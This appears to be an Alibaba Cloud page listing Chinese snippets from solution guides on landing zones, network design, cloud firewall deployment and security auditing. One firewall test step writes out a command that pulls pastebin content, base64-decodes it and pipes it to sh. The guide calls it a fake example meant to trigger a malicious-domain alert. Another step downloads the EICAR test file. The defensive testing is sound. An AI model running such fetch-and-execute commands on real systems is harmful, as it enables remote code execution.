Landing-zone
企业上云第一步,规划和落地云上资源结构、访问安全、网络架构、安全合规体系,为企业搭建安全、高效、可管理的云环境。
对于权限的使用持续监控和优化单点登录 SSO访问控制 RAM05安全防护·配置防火墙组件,加强安全防御能力·对于主机定期更新、病毒扫描、端口检查·对重要数据开启加密或脱敏等防护措施·为应用开启WAF或DDoS防护云防火墙DDoS防护云安全中心Web应用防火墙 WAF06运维管理·构建以CMDB为核心的运维管理体系·标准的发布变更流程...
来自:
解决方案
基于SpringCloud应用玩转MSE实践
随着业务不断创新,大型的单个应用和服务会被拆分为数个甚至数十个微服务,微服务架构已经被广泛应用。 微服务的好处在于快速迭代,如何在迭代过程中保障线上流量不受损。依赖开源产品缺少无运维工具,常常需要投入较大的运维人力和成本。 本实践提供基于云原生应用产品提供微服务注册配置中心、微服务治理和云原生网关等一系列高性能和高可用的企业级云服务能力。
弹性公网IP:是独立的公网IP资源,可与阿里云专有网络VPC类型的云服务器ECS、NAT网关、ENI 网卡、私网负载均衡SLB绑定,并可以动态解绑满足灵活管理的要求。弹性公网IP可为您在云上部署 的网站提供Internet访问服务。 NAT网关(NATGateway)提供公网NAT和私网NAT两种功能。公网NAT网关通过自定义SNAT、文档版本:...
云速搭部署云防火墙最佳实践
本实践通过云速搭实现云防火墙的示例架构,开通一个典型的网络服务。
详 见:https://www.aliyun.com/product/cfw 文档版本:20211105 3 云速搭部署云防火墙 云速搭架构设计入门 云速搭架构设计入门 方案架构 通过云速搭实现云防火墙的示例架构,开通一个典型的网络服务。云防火墙选型查看 如下文档:https://help.aliyun.com/document_detail/162300.html 文档版本:20211105 4 云速搭部署云...
企业云上网络架构规划
企业云上网络架构规划方案能够为企业提供面向业务的网络架构,确保业务的可靠性,并保持架构的可扩展性和可持续性。
产品解决方案文档与社区权益中心定价云市场合作伙伴支持与服务了解阿里云备案控制台企业云上网络架构规划方案介绍方案优势应用场景方案部署方案权益企业云上网络架构规划对于一些刚开始进行云上迁移的企业而言,需要在短时间内完成业务系统的迁移。在迁移过程中,首要步骤通常是进行整体网络设计,以满足业务需求并规划云上...
来自:
解决方案
云上公网架构设计和安全管理
云上公网的设计可以帮助企业更加统一、安全地管理自己的云上互联网出入口,同时可以实现统一监控运维和公网的成本优化。
相关产品负载均衡 SLBNAT 网关转发路由器 TR云企业网 CEN共享带宽弹性公网 IPDDoS 防护Web应用防火墙 WAF云防火墙在线咨询方案优势 高可靠提供多层次的容灾策略与跨可用区级高可用体验,保障业务连续性。高性能云原生的网络产品具备大流量处理能力和超强弹性,轻松应对业务突峰。高安全多层防护保障业务核心数据安全,降低...
来自:
解决方案
企业级云上网络解决方案
企业级云上网络解决方案充分利用阿里云的相关产品能力,构建一张安全灵活可靠的云上网络平台。在满足业务可靠性、可扩展性等要求的同时,也能够满足企业在运维、安全和财务管理等方面的要求,支持企业业务系统向云计算平台进行迁移部署。
同时,使用云防火墙、安全组、子网 ACL、路由策略等提供全面的网络安全能力,以及利用多 AZ 和多 Region 实现高可用,帮助企业构建一张安全可靠的云上网络.本解决方案可以让您快速构建一个企业级混合云网络架构,将企业的所有场景纳入到一张大的企业网内,IT 运维可以方便的对整网进行管控,包括路由控制,ACL 规则,权限...
来自:
解决方案
企业多账号环境下的安全资源统一管控最佳实践
某地产公司在上海、杭州设有两个分公司,公司使用阿里云支撑各分公司的 IT 业务系统,这些系统由各分公司独立负责,包括独立负责云上业务账号的创建、员工权限的分配管理、资源的购买、IT 风险的管控、安全管理等。由于公司业务发展较快,各分公司创建了非常多的业务账号来承载新的业务,每个业务账号独立管理,带来了非常大的管理问题。人员权限管理混乱,离职员工在云上的身份梳理不清难以及时清理造成极大的安全隐患;账号权限过大、使用弱密码可能造成账号被盗数据泄露;公司内部缺乏统一的合规基线和安全管控,各业务系统各自为政,数据泄露、业务中断、安全入侵风险升级。 为了提升云上的管控效率和安全性,总公司成立新的信息安全中心和阿里云对接。信息安全中心的定位是统一采购安全产品,集中保障云上资源的安全性。
CFW:阿里云云防火墙(Cloud Firewall)是业界首款公共云环境下的 SaaS化防 火墙,可统一管理南北向和东西向的流量,提供流量监控、精准访问控制、实时入 侵防御等功能,全面保护您的网络安全。详见:https://www.aliyun.com/product/cfw 云安全中心:云安全中心是一个实时识别、分析、预警安全威胁的统一安全管理系 统,通过...
远程办公-AD管控下的弹性云桌面
在弹性云桌面中部署企业基础办公环境时,IT人员通常会面临以下问题,本文希望通过场景实践的方式,示范如何结合使用不同阿里云产品,来解决这些问题:用户如何管理?企业已有AD用户如何上云?云上共享文件服务权限怎么管?数据安全问题有保障吗?该如何设置?云桌面能使用本地机房或IDC中的服务吗? 本文使用的应用场景: 场景1:客户A在云上新建Windows ActiveDirectory(以下简称AD);弹性云桌面,和NAS文件存储服务部署在AD所在的VPC内。场景2:客户B在阿里云上已有AD和NAS。弹性云桌面创建在与AD不同的VPC中。AD与云桌面的VPC通过CEN连接。场景3:客户C在云下IDC有自建AD和文件服务。弹性云桌面创建在阿里云上。云下机房与阿里云弹性云桌面所在VPC通过IPsec VPN连接。 方案优势: 易部署:弹性云桌面支持快速便捷的桌面环境创建、部署、统一管控与运维。 CEN和VPN网关服务开通即用,配置实时生效,快速完成部署。 低成本:弹性云桌面无需前期传统硬件投资,帮您快速构建安全、高性能、低成本的桌面办公体系。可广泛应用于具有高数据安全管控、高性能计算等要求的金融、设计、视频、教育等领域。VPN网关基于Internet建立加密通道,比建立专线更便宜,快速实现混合云。 安全性:VPN网关使用IKE(秘钥交换协议)和IPSec对传输数据或进行加密,保证数据安全可靠。云桌面自带的安全策略保证数据不落地。 集中管控:通过Windows AD对云桌面用户和共享文件服务进行统一权限管控。可实现AD用户自动同步上云,和文件级别的权限管控。
远程办公-AD管控下的弹性云桌面 最佳实践 云桌面接入方式:弹性云桌面客户端 云桌面和企业 IDC互联:IPSec或者物理专线 员工通过弹性云桌面客户端,可从任何网络安全地登录 通过 IPSec VPN或物理专线将云桌面 VPC网络和企 云桌面实例进行远程办公。业 IDC网络连通,员工在云桌面中可以使用公司内 部应用和资源。集成现有 ...
企业上云框架 Landing Zone
基于大量企业的上云实践验证,帮助企业规划云上资源结构、访问控制、网络架构、安全合规体系,搭建可管理、可扩展的云环境。企业客户可以在此基础上缩短上云周期,将原有的业务平顺上云并快速开展新业务。
加速业务规模化上云效率基于可拓展和自动化的设计,可以降低业务规模化上云后管理难度,有效缩短企业上云的实施时间,加速企业数字化转型,应对业务高速发展。各团队在阿里云上高效协同整体框架充分考虑了运维、财务、合规、安全、业务等团队的诉求,降低团队之间耦合和流程卡点,提升团队协作效率。应用场景初次上云环境的...
来自:
解决方案
企业上云workshop
本文模拟了如下场景: 1. 线下 IDC 环境中部署了一个业务系统,业务是利用 wordpress 系统提供网站服务。 2. 本文详细介绍了如何将以上线下系统搬迁到云上, 包括如何在云上构建以上业务系统,如何迁移线下 系统到云上,如何割接。 3. 最后介绍了迁移上云后,如何部署安全系统。 解决问题 IDC 业务系统搬迁上云 云上构建业务系统 部署安全系统
这个域名已经在云防火墙的恶 意域名中,发现即告警。操作步骤 步骤1 通过 EIP,SSH登录到 ECS服务器。步骤2 执行以下命令(注:这条只是伪造举例的命令,不会执行成功):curl https://pastebin.com/raw/sByq0rym (wget-q-O-https://pastebin.com/raw/tqJjUD9d)|base64-d|sh 文档版本:20200127 130 部署云防火墙 企业上云 ...
来自:
最佳实践
相关产品:专有网络 VPC,云服务器ECS,云数据库RDS MySQL 版,对象存储 OSS,负载均衡 SLB,弹性公网IP,文件存储NAS,云数据库PolarDB,Web应用防火墙,云防火墙,SSL证书,云速搭
传统企业业务上云基础安全防护
场景描述 越来越多的企业客户选择把自己的生产系统部 署在公共云平台上,以满足自身业务的发展及弹 性扩缩容、稳定性等方面的需求。如何在公共云 上构建基本的网络安全、主机安全、入侵检测、 运维审计等方案,是企业首选的最佳实践。 解决问题 1.服务器安全、应用安全 2.网络安全、数据安全 3.安全审计、安全管理 产品列表 云安全中心 Web应用防火墙 云防火墙 SSL证书 数据库审计 堡垒机
这个域名已经在云防火墙的恶意域名 中,发现即告警。操作步骤 步骤1 通过EIP,SSH登录到ECS服务器。步骤2 执行以下命令 wgethttps:/secure.eicar.org/eicar_com.zip 步骤3 过一小时后返回到云防火墙控制台。步骤4 在左侧导航栏选择流量分析>主动外联活动,查看主动外联日志。文档版本:20220210 49传统企业业务上云基础安全...
混合云多云统一安全
场景描述 有些客户的业务系统部分上云、或者还没上 云,但想使用阿里云公共云的安全服务;或 者业务系统部署在多个云平台上,想使用阿 里云的安全来提供统一服务。 解决问题 1.通过阿里云的安全产品和服务,统一管理阿 里云、IDC和它云的资产; 2.满足混合云、多云的等保需求。 产品列表 云安全中心 堡垒机 数据库审计 高防IP Web应用防火墙 证书服务 日志服务 VPN网关
本最佳实践中,业务系统全部部署在它云内,网络及应用安全使用云上高防及 WAF,回源到它云服务器;使用 VPN网关在云上 VPC和它云内网间建立 IPSec加密隧道,主机安全,运维及安全审计使用云上相应服务。同时,在它云或 IDC侧,只需要有一台带 VPN的防火墙即可,做网络访问控制及与 阿里云之间建立 VPN隧道;如果有 IPS能力...
云上日志集中审计
场景描述 云上的各类云产品和客户部署的业务系统会产生各类 日志,企业合规及安全运营等都需要在一个地方能 集中的查看和分析日志;目前各云产品日志大部分 都进了sls,但都是产品独立的project,不方便集中 审计;客户的业务系统日志各种形态都有;多云和混 合云的场景,日志也需要能集中审计。 解决问题 1.所有日志集中到SLS一个中心project下。 2.满足等保合规和内部合规需求。 3.满足运维和安全运营需求。 产品列表 日志服务SLS 专有网络VPC 弹性公网IPEIP 负载均衡SLB 云服务器ECS 云数据库RDS 云防火墙CFW
文档版本:20200630(发布日期)36 云上日志集中审计 集中云安全产品日志 步骤6 云防火墙的日志查询中,可以看到日志。SLS产品的 project列表中,新增加了一个云防火墙的日志 project;并且能看到日志 内容,和在云防火墙控制台上看到的一样;文档版本:20200630(发布日期)37 云上日志集中审计 集中云安全产品日志 5.2....
企业应用(酒店PMS)混合云组网最佳实践
酒店上云是分阶段实施,线下和云上的混合云是长期 状态,需要保证线下多地域多分支、云上多地域之间 互相访问,且需要满足不同类型的企业节点的服务要 求,比如总部 IDC 要求带宽大,对安全可靠性要求 高等。
产品介绍 VPC:专有网络(Virtual Private Cloud),是用户基于阿里云创建的自定义私有网 络,不同的专有网络之间二层逻辑隔离,用户可以在自己创建的专有网络内创建和 管理云产品实例,比如 ECS、负载均衡、RDS等。VSW:虚拟交换机(Virtual Switch),阿里云专有网络的基础网络设备,通过创建 交换机为专有网络划分一个...
- 产品推荐
- 这些文档可能帮助您